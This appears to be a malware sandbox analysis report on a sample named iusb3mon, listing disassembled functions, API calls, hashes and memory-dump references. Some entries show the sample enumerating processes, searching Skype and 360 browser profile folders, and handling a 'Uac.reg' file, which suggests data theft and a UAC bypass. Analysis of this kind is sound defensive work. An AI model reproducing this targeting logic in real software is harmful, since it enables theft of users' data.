                                                                                                                    • Associated: 0000001C.00000002.4577401759.0000000006278000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                    • Associated: 0000001C.00000002.4577401759.000000000627A000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_28_2_6240000_iusb3mon.jbxd
                                                                                                                    Yara matches
                                                                                                                    Similarity
                                                                                                                    • API ID: H_prolog$FileFindFirst$CreateDecrementFolderInterlockedNextPathProcess32SleepSnapshotSpecialToolhelp32lstrlen
                                                                                                                    • String ID: C:\Users\$Skype.exe$\AppData\Roaming\Microsoft\Skype for Desktop
                                                                                                                    • API String ID: 12226711-3499480952
                                                                                                                    • Opcode ID: 7a385f5d273c61b57093e25813ef461ac88692877b6aff626a63919f5d8cc580
                                                                                                                    • Instruction ID: bf031e7c418c9b1b6b0163101e68d27ee8213797eb467ef4710b002e64d5e1d0
                                                                                                                    • Opcode Fuzzy Hash: 7a385f5d273c61b57093e25813ef461ac88692877b6aff626a63919f5d8cc580
                                                                                                                    • Instruction Fuzzy Hash: C6119071D60319EADBA5EBE0DD46FEEB7B8AF14300F114155BE21B21C0DBB85B488B61
                                                                                                                    Function 06244957 Relevance: 10.6, APIs: 3, Strings: 3, Instructions: 57sleepCOMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    • __EH_prolog.LIBCMT ref: 0624495C
                                                                                                                      • Part of subcall function 06243441: __EH_prolog.LIBCMT ref: 06243446
                                                                                                                      • Part of subcall function 06243441: CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 0624345C
                                                                                                                      • Part of subcall function 06243441: Process32First.KERNEL32(00000000,?), ref: 06243475
                                                                                                                    • SHGetSpecialFolderPathA.SHELL32(00000000,?,00000007,00000000), ref: 0624498A
                                                                                                                      • Part of subcall function 062587FB: lstrlenA.KERNEL32(?), ref: 0625883F
                                                                                                                      • Part of subcall function 06258633: __EH_prolog.LIBCMT ref: 06258638
                                                                                                                      • Part of subcall function 062585BF: __EH_prolog.LIBCMT ref: 062585C4
                                                                                                                      • Part of subcall function 062584B1: InterlockedDecrement.KERNEL32(-000000F4), ref: 062584C5
                                                                                                                    • Sleep.KERNEL32(000003E8,?,00000000,\AppData\Roaming\360se6\User Data\Default,?,C:\Users\,?), ref: 062449E6
                                                                                                                      • Part of subcall function 06242E2C: __EH_prolog.LIBCMT ref: 06242E31
                                                                                                                      • Part of subcall function 06242E2C: FindFirstFileA.KERNEL32(?,?), ref: 06242EBF
                                                                                                                      • Part of subcall function 06242E2C: FindNextFileA.KERNEL32(00000000,00000010,00000001,?,?,00000001), ref: 06242F7F
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 0000001C.00000002.4577401759.0000000006240000.00000040.00001000.00020000.00000000.sdmp, Offset: 06240000, based on PE: true
                                                                                                                    • Associated: 0000001C.00000002.4577401759.0000000006271000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                    • Associated: 0000001C.00000002.4577401759.0000000006273000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                    • Associated: 0000001C.00000002.4577401759.0000000006276000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                    • Associated: 0000001C.00000002.4577401759.0000000006278000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                    • Associated: 0000001C.00000002.4577401759.000000000627A000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_28_2_6240000_iusb3mon.jbxd
                                                                                                                    Yara matches
                                                                                                                    Similarity
                                                                                                                    • API ID: H_prolog$FileFindFirst$CreateDecrementFolderInterlockedNextPathProcess32SleepSnapshotSpecialToolhelp32lstrlen
                                                                                                                    • String ID: 360se6.exe$C:\Users\$\AppData\Roaming\360se6\User Data\Default
                                                                                                                    • API String ID: 12226711-1244823433
                                                                                                                    • Opcode ID: 9cb01969ea717f59736d41824555ebda7f153aa765b0f1fae8090a02ee0bff00
                                                                                                                    • Instruction ID: 1cebcd8430e02ab91257faabd431e07a3df05ae1b01aae89b4fd8cb2cdc3e02f
                                                                                                                    • Opcode Fuzzy Hash: 9cb01969ea717f59736d41824555ebda7f153aa765b0f1fae8090a02ee0bff00
                                                                                                                    • Instruction Fuzzy Hash: 23118E71960319AADBA5EBE0DD46FEEBBB8AF14300F114155FE21B21C0DBB85B448A61
                                                                                                                    Function 06243C01 Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 40sleepfileCOMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    • GetModuleFileNameA.KERNEL32(00000000,?,000000E1), ref: 06243C3D
                                                                                                                    • CopyFileA.KERNEL32(?,?,00000000), ref: 06243C53
                                                                                                                      • Part of subcall function 06243BBA: CreateFileA.KERNEL32(?,40000000,00000001,00000000,00000002,00000000,00000000), ref: 06243BD0
                                                                                                                      • Part of subcall function 06243BBA: WriteFile.KERNEL32(00000000,06265588,000000F5,?,00000000), ref: 06243BE8
                                                                                                                      • Part of subcall function 06243BBA: CloseHandle.KERNEL32(00000000), ref: 06243BF5
                                                                                                                    • Sleep.KERNEL32(?), ref: 06243C72
                                                                                                                    • Sleep.KERNEL32(000003E8), ref: 06243C79
                                                                                                                    • DeleteFileA.KERNEL32(Uac.reg), ref: 06243C80
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 0000001C.00000002.4577401759.0000000006240000.00000040.00001000.00020000.00000000.sdmp, Offset: 06240000, based on PE: true
                                                                                                                    • Associated: 0000001C.00000002.4577401759.0000000006271000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                    • Associated: 0000001C.00000002.4577401759.0000000006273000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                    • Associated: 0000001C.00000002.4577401759.0000000006276000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                    • Associated: 0000001C.00000002.4577401759.0000000006278000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                    • Associated: 0000001C.00000002.4577401759.000000000627A000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_28_2_6240000_iusb3mon.jbxd
                                                                                                                    Yara matches
                                                                                                                    Similarity
                                                                                                                    • API ID: File$Sleep$CloseCopyCreateDeleteHandleModuleNameWrite
                                                                                                                    • String ID: Uac.reg
                                                                                                                    • API String ID: 3965208581-763348774
                                                                                                                    • Opcode ID: 307578baf7380074c0c89fe3631f1b0066d74dd1630b05ab1ad64526c7e2d37e
                                                                                                                    • Instruction ID: 36c1e22bae4c16c8cec32bac985916aae571f3b882a74bee708e70f3bcaa12fe
                                                                                                                    • Opcode Fuzzy Hash: 307578baf7380074c0c89fe3631f1b0066d74dd1630b05ab1ad64526c7e2d37e
                                                                                                                    • Instruction Fuzzy Hash: D0014F729003199BEB64ABA4EC49FCE7BBDEB04310F0041A2E789E6584DAB096848F51
                                                                                                                    Function 0625B5EE Relevance: 10.5, APIs: 7, Instructions: 29COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    • GetSysColor.USER32(0000000F), ref: 0625B5FA
                                                                                                                    • GetSysColor.USER32(00000010), ref: 0625B601
                                                                                                                    • GetSysColor.USER32(00000014), ref: 0625B608
                                                                                                                    • GetSysColor.USER32(00000012), ref: 0625B60F
                                                                                                                    • GetSysColor.USER32(00000006), ref: 0625B616
                                                                                                                    • GetSysColorBrush.USER32(0000000F), ref: 0625B623
                                                                                                                    • GetSysColorBrush.USER32(00000006), ref: 0625B62A
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 0000001C.00000002.4577401759.0000000006240000.00000040.00001000.00020000.00000000.sdmp, Offset: 06240000, based on PE: true
                                                                                                                    • Associated: 0000001C.00000002.4577401759.0000000006271000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                    • Associated: 0000001C.00000002.4577401759.0000000006273000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                    • Associated: 0000001C.00000002.4577401759.0000000006276000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                    • Associated: 0000001C.00000002.4577401759.0000000006278000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                    • Associated: 0000001C.00000002.4577401759.000000000627A000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_28_2_6240000_iusb3mon.jbxd
                                                                                                                    Yara matches
                                                                                                                    Similarity
                                                                                                                    • API ID: Color$Brush
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 2798902688-0
                                                                                                                    • Opcode ID: ade09eef89f57afe1f859758a745e6b28d0922955f9854d364a11634928e1593
                                                                                                                    • Instruction ID: 8c51be8cbaf171913be0db746f33093499b8c70adbf7fc13bf23f9b6e988c95a
                                                                                                                    • Opcode Fuzzy Hash: ade09eef89f57afe1f859758a745e6b28d0922955f9854d364a11634928e1593
                                                                                                                    • Instruction Fuzzy Hash: 49F01C719407489BD730BF729D0AB47BAE1FFC4B10F020D2EE2858BA90E6B5A400DF40
                                                                                                                    Function 001D5674 Relevance: 9.2, APIs: 6, Instructions: 175COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    • MultiByteToWideChar.KERNEL32(00000000,00000000,00000001,?,00000000,00000000,?,?,?,00000001,?,00000000,001F87D3,?,?,bad locale name), ref: 001D56BD
                                                                                                                    • MultiByteToWideChar.KERNEL32(00000001,00000001,00000000,?,00000000,00000000,?,00000000,001F87D3,?,?,bad locale name), ref: 001D5728
                                                                                                                    • LCMapStringEx.KERNEL32(00000000,?,00000000,00000000,00000000,00000000,00000000,00000000,00000000,?,00000000,001F87D3,?,?,bad locale name), ref: 001D5745
                                                                                                                    • LCMapStringEx.KERNEL32(00000000,?,00000000,00000000,00000000,?,00000000,00000000,00000000,?,00000000,001F87D3,?,?,bad locale name), ref: 001D5784
                                                                                                                    • LCMapStringEx.KERNEL32(00000000,?,00000000,00000000,00000000,00000000,00000000,00000000,00000000,?,00000000,001F87D3,?,?,bad locale name), ref: 001D57E3
                                                                                                                    • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,?,?,00000000,00000000,?,00000000,001F87D3,?,?,bad locale name), ref: 001D5806
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 0000001C.00000002.4571601291.00000000001D1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 001D0000, based on PE: true
                                                                                                                    • Associated: 0000001C.00000002.4571337549.00000000001D0000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                    • Associated: 0000001C.00000002.4571918062.00000000001EE000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                    • Associated: 0000001C.00000002.4572153673.00000000001FC000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                    • Associated: 0000001C.00000002.4572420177.00000000001FE000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                    • Associated: 0000001C.00000002.4572664793.0000000000203000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                    • Associated: 0000001C.00000002.4572895265.0000000000204000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                    • Associated: 0000001C.00000002.4573068486.0000000000206000.00000040.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                    • Associated: 0000001C.00000002.4573068486.000000000026C000.00000040.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                    • Associated: 0000001C.00000002.4573068486.000000000026E000.00000040.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                    • Associated: 0000001C.00000002.4573068486.0000000000270000.00000040.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                    • Associated: 0000001C.00000002.4573068486.0000000000274000.00000040.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                    • Associated: 0000001C.00000002.4573068486.0000000000276000.00000040.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                    • Associated: 0000001C.00000002.4573068486.0000000000278000.00000040.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                    • Associated: 0000001C.00000002.4573068486.000000000027A000.00000040.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                    • Associated: 0000001C.00000002.4573068486.000000000028A000.00000040.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                    • Associated: 0000001C.00000002.4573068486.000000000028C000.00000040.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                    • Associated: 0000001C.00000002.4573068486.0000000000293000.00000040.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                    • Associated: 0000001C.00000002.4573068486.0000000000295000.00000040.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                    • Associated: 0000001C.00000002.4573068486.0000000000297000.00000040.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                    • Associated: 0000001C.00000002.4573068486.0000000000299000.00000040.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                    • Associated: 0000001C.00000002.4573068486.000000000029B000.00000040.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                    • Associated: 0000001C.00000002.4573068486.000000000029E000.00000040.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                    • Associated: 0000001C.00000002.4573068486.00000000002A1000.00000040.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                    • Associated: 0000001C.00000002.4573068486.00000000002A5000.00000040.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                    • Associated: 0000001C.00000002.4573068486.00000000002AA000.00000040.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                    • Associated: 0000001C.00000002.4573068486.00000000002B0000.00000040.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                    • Associated: 0000001C.00000002.4573068486.00000000002B2000.00000040.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                    • Associated: 0000001C.00000002.4573068486.00000000002BA000.00000040.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                    • Associated: 0000001C.00000002.4573068486.00000000002C0000.00000040.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                    • Associated: 0000001C.00000002.4573068486.00000000002C6000.00000040.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                    • Associated: 0000001C.00000002.4573068486.00000000002C8000.00000040.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                    • Associated: 0000001C.00000002.4573068486.00000000002ED000.00000040.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                    • Associated: 0000001C.00000002.4575400315.000000000058A000.00000020.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_28_2_1d0000_iusb3mon.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: ByteCharMultiStringWide
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 2829165498-0
                                                                                                                    • Opcode ID: 483d96aa4702400923525dda53c461c697293e731f7d2737f815a19552e2d4ae
                                                                                                                    • Instruction ID: ae8c1aeb278a395ecb2468cb050cd71ce026a166f72d00d1966f87a3d8eeb769
                                                                                                                    • Opcode Fuzzy Hash: 483d96aa4702400923525dda53c461c697293e731f7d2737f815a19552e2d4ae
                                                                                                                    • Instruction Fuzzy Hash: 2351C37260060AEFEB209FA5CC81FAF7BAAEF44750F654526F9059A250D770DC50DBA0
                                                                                                                    Function 001D2DE0 Relevance: 9.1, APIs: 6, Instructions: 139COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    • std::_Lockit::_Lockit.LIBCPMT ref: 001D2E36
                                                                                                                    • std::_Lockit::_Lockit.LIBCPMT ref: 001D2E58
                                                                                                                    • std::_Lockit::~_Lockit.LIBCPMT ref: 001D2E78
                                                                                                                    • std::_Facet_Register.LIBCPMT ref: 001D2EE5
                                                                                                                    • std::_Lockit::~_Lockit.LIBCPMT ref: 001D2F01
                                                                                                                    • Concurrency::cancel_current_task.LIBCPMT ref: 001D2F61
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 0000001C.00000002.4571601291.00000000001D1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 001D0000, based on PE: true
                                                                                                                    • Associated: 0000001C.00000002.4571337549.00000000001D0000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                    • Associated: 0000001C.00000002.4571918062.00000000001EE000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                    • Associated: 0000001C.00000002.4572153673.00000000001FC000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                    • Associated: 0000001C.00000002.4572420177.00000000001FE000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                    • Associated: 0000001C.00000002.4572664793.0000000000203000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                    • Associated: 0000001C.00000002.4572895265.0000000000204000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                    • Associated: 0000001C.00000002.4573068486.0000000000206000.00000040.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                    • Associated: 0000001C.00000002.4573068486.000000000026C000.00000040.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                    • Associated: 0000001C.00000002.4573068486.000000000026E000.00000040.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                    • Associated: 0000001C.00000002.4573068486.0000000000270000.00000040.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                    • Associated: 0000001C.00000002.4573068486.0000000000274000.00000040.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                    • Associated: 0000001C.00000002.4573068486.0000000000276000.00000040.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                    • Associated: 0000001C.00000002.4573068486.0000000000278000.00000040.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                    • Associated: 0000001C.00000002.4573068486.000000000027A000.00000040.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                    • Associated: 0000001C.00000002.4573068486.000000000028A000.00000040.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                    • Associated: 0000001C.00000002.4573068486.000000000028C000.00000040.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                    • Associated: 0000001C.00000002.4573068486.0000000000293000.00000040.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                    • Associated: 0000001C.00000002.4573068486.0000000000295000.00000040.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                    • Associated: 0000001C.00000002.4573068486.0000000000297000.00000040.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                    • Associated: 0000001C.00000002.4573068486.0000000000299000.00000040.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                    • Associated: 0000001C.00000002.4573068486.000000000029B000.00000040.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                    • Associated: 0000001C.00000002.4573068486.000000000029E000.00000040.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                    • Associated: 0000001C.00000002.4573068486.00000000002A1000.00000040.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                    • Associated: 0000001C.00000002.4573068486.00000000002A5000.00000040.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                    • Associated: 0000001C.00000002.4573068486.00000000002AA000.00000040.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                    • Associated: 0000001C.00000002.4573068486.00000000002B0000.00000040.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                    • Associated: 0000001C.00000002.4573068486.00000000002B2000.00000040.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                    • Associated: 0000001C.00000002.4573068486.00000000002BA000.00000040.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                    • Associated: 0000001C.00000002.4573068486.00000000002C0000.00000040.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                    • Associated: 0000001C.00000002.4573068486.00000000002C6000.00000040.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                    • Associated: 0000001C.00000002.4573068486.00000000002C8000.00000040.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                    • Associated: 0000001C.00000002.4573068486.00000000002ED000.00000040.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                    • Associated: 0000001C.00000002.4575400315.000000000058A000.00000020.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_28_2_1d0000_iusb3mon.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: std::_$Lockit$Lockit::_Lockit::~_$Concurrency::cancel_current_taskFacet_Register
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 2081738530-0
                                                                                                                    • Opcode ID: e89f429e2cd4990f79f60d7bde9ea75305b9a44ccbcb27d8f6a18f11af038ff9
                                                                                                                    • Instruction ID: 17d6d21f5d80f52e75f3eaec9f8ef5cba965699ede6d6f11fcfff00706ce22f3
                                                                                                                    • Opcode Fuzzy Hash: e89f429e2cd4990f79f60d7bde9ea75305b9a44ccbcb27d8f6a18f11af038ff9
                                                                                                                    • Instruction Fuzzy Hash: E051C271A00214DFCB11DF98D884BAEBBF1FF58720F14419AE815AB391CB30AE41CBA1
                                                                                                                    Function 06251CDF Relevance: 9.1, APIs: 6, Instructions: 117COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    • GetStringTypeW.KERNEL32(00000001,0625E7F0,00000001,?,7591E860,0627893C,?,?,00000002,00000000,?,?,06253769,?), ref: 06251D1E
                                                                                                                    • GetStringTypeA.KERNEL32(00000000,00000001,06276150,00000001,?,?,?,06253769,?), ref: 06251D38
                                                                                                                    • GetStringTypeA.KERNEL32(?,?,?,00000000,00000002,7591E860,0627893C,?,?,00000002,00000000,?,?,06253769,?), ref: 06251D6C
                                                                                                                    • MultiByteToWideChar.KERNEL32(?,0627893D,?,00000000,00000000,00000000,7591E860,0627893C,?,?,00000002,00000000,?,?,06253769,?), ref: 06251DA4
                                                                                                                    • MultiByteToWideChar.KERNEL32(?,00000001,?,?,?,?), ref: 06251DFA
                                                                                                                    • GetStringTypeW.KERNEL32(?,?,00000000,?,?,?), ref: 06251E0C
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 0000001C.00000002.4577401759.0000000006240000.00000040.00001000.00020000.00000000.sdmp, Offset: 06240000, based on PE: true
                                                                                                                    • Associated: 0000001C.00000002.4577401759.0000000006271000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                    • Associated: 0000001C.00000002.4577401759.0000000006273000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                    • Associated: 0000001C.00000002.4577401759.0000000006276000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                    • Associated: 0000001C.00000002.4577401759.0000000006278000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                    • Associated: 0000001C.00000002.4577401759.000000000627A000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_28_2_6240000_iusb3mon.jbxd
                                                                                                                    Yara matches
                                                                                                                    Similarity
                                                                                                                    • API ID: StringType$ByteCharMultiWide
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 3852931651-0
                                                                                                                    • Opcode ID: 977029f4f6e976e804c594426439e4ef4dcf83b6438a1e10bf68d60a8321528a
                                                                                                                    • Instruction ID: e69663572c8a129ed339012345425a557b5f6b03a713925a2b2057ae985c9348
                                                                                                                    • Opcode Fuzzy Hash: 977029f4f6e976e804c594426439e4ef4dcf83b6438a1e10bf68d60a8321528a
                                                                                                                    • Instruction Fuzzy Hash: C0417E71A6021AAFDF649F94DC89EEF7B7AFB09650F114415FE11D6250C3718960CBA0
                                                                                                                    Function 0625C729 Relevance: 9.1, APIs: 6, Instructions: 85memoryCOMMONLIBRARYCODE
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    • TlsGetValue.KERNEL32(00000000,06276588,00000000,?,00000000,?,0625C89F,06276588,00000000,?,00000100,0625C48E,0625C4D2,062587DA,00000100,06258773), ref: 0625C734
                                                                                                                    • EnterCriticalSection.KERNEL32(0000001C,00000010,?,00000000,?,0625C89F,06276588,00000000,?,00000100,0625C48E,0625C4D2,062587DA,00000100,06258773,?), ref: 0625C783
                                                                                                                    • LeaveCriticalSection.KERNEL32(0000001C,00000000,?,00000000,?,0625C89F,06276588,00000000,?,00000100,0625C48E,0625C4D2,062587DA,00000100,06258773,?), ref: 0625C796
                                                                                                                    • LocalAlloc.KERNEL32(00000000,?,?,00000000,?,0625C89F,06276588,00000000,?,00000100,0625C48E,0625C4D2,062587DA,00000100,06258773,?), ref: 0625C7AC
                                                                                                                    • LocalReAlloc.KERNEL32(?,?,00000002,?,00000000,?,0625C89F,06276588,00000000,?,00000100,0625C48E,0625C4D2,062587DA,00000100,06258773), ref: 0625C7BE
                                                                                                                    • TlsSetValue.KERNEL32(00000000,00000000,00000100), ref: 0625C7FA
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 0000001C.00000002.4577401759.0000000006240000.00000040.00001000.00020000.00000000.sdmp, Offset: 06240000, based on PE: true
                                                                                                                    • Associated: 0000001C.00000002.4577401759.0000000006271000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                    • Associated: 0000001C.00000002.4577401759.0000000006273000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                    • Associated: 0000001C.00000002.4577401759.0000000006276000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                    • Associated: 0000001C.00000002.4577401759.0000000006278000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                    • Associated: 0000001C.00000002.4577401759.000000000627A000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_28_2_6240000_iusb3mon.jbxd
                                                                                                                    Yara matches
                                                                                                                    Similarity
                                                                                                                    • API ID: AllocCriticalLocalSectionValue$EnterLeave
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 4117633390-0
                                                                                                                    • Opcode ID: 6bf0402fb0b80ea975bae7f4492d6d8cac733bd56396b1e8b2e1ae26f9051708
                                                                                                                    • Instruction ID: 21045cc9cb74425677508fa449e88b989aa3317bd999aa5aacf9a0fcfbf11fa0
                                                                                                                    • Opcode Fuzzy Hash: 6bf0402fb0b80ea975bae7f4492d6d8cac733bd56396b1e8b2e1ae26f9051708
                                                                                                                    • Instruction Fuzzy Hash: 06319A35220705AFE774DF18D888E66B7A9FB44360F018619ED6A8B680EB30E904CB60
                                                                                                                    Function 06259ED2 Relevance: 9.1, APIs: 6, Instructions: 82windowCOMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    • __EH_prolog.LIBCMT ref: 06259ED7
                                                                                                                    • SendMessageA.USER32(?,0000001F,00000000,00000000), ref: 06259F24
                                                                                                                    • SendMessageA.USER32(?,0000001F,00000000,00000000), ref: 06259F46
                                                                                                                    • GetCapture.USER32 ref: 06259F58
                                                                                                                    • SendMessageA.USER32(00000000,0000001F,00000000,00000000), ref: 06259F67
                                                                                                                    • WinHelpA.USER32(?,?,?,?), ref: 06259F7B
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 0000001C.00000002.4577401759.0000000006240000.00000040.00001000.00020000.00000000.sdmp, Offset: 06240000, based on PE: true
                                                                                                                    • Associated: 0000001C.00000002.4577401759.0000000006271000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                    • Associated: 0000001C.00000002.4577401759.0000000006273000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                    • Associated: 0000001C.00000002.4577401759.0000000006276000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                    • Associated: 0000001C.00000002.4577401759.0000000006278000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                    • Associated: 0000001C.00000002.4577401759.000000000627A000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_28_2_6240000_iusb3mon.jbxd
                                                                                                                    Yara matches
                                                                                                                    Similarity
                                                                                                                    • API ID: MessageSend$CaptureH_prologHelp
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 432264411-0
                                                                                                                    • Opcode ID: bee6a4d9e671115ce7da23f521b9f35e5001e4ddf5c90f6f79a44235d83302d5
                                                                                                                    • Instruction ID: 5eeefbb11c440632f672d41dc539907cc6e5f268e1a086a29de2e3771e3b1e95
                                                                                                                    • Opcode Fuzzy Hash: bee6a4d9e671115ce7da23f521b9f35e5001e4ddf5c90f6f79a44235d83302d5
                                                                                                                    • Instruction Fuzzy Hash: 3D218171710309BFEBB06F64DC89FBA7ABAEF44754F124528FE519B1E1CAB09C019A10
                                                                                                                    Function 0625C0EA Relevance: 9.1, APIs: 6, Instructions: 67COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    • GetParent.USER32(?), ref: 0625C11D
                                                                                                                    • GetLastActivePopup.USER32(?), ref: 0625C12C
                                                                                                                    • IsWindowEnabled.USER32(?), ref: 0625C141
                                                                                                                    • EnableWindow.USER32(?,00000000), ref: 0625C154
                                                                                                                    • GetWindowLongA.USER32(?,000000F0), ref: 0625C166
                                                                                                                    • GetParent.USER32(?), ref: 0625C174
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 0000001C.00000002.4577401759.0000000006240000.00000040.00001000.00020000.00000000.sdmp, Offset: 06240000, based on PE: true
                                                                                                                    • Associated: 0000001C.00000002.4577401759.0000000006271000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                    • Associated: 0000001C.00000002.4577401759.0000000006273000.00000040.00001000.00020000.00000000.sdmpDownload File
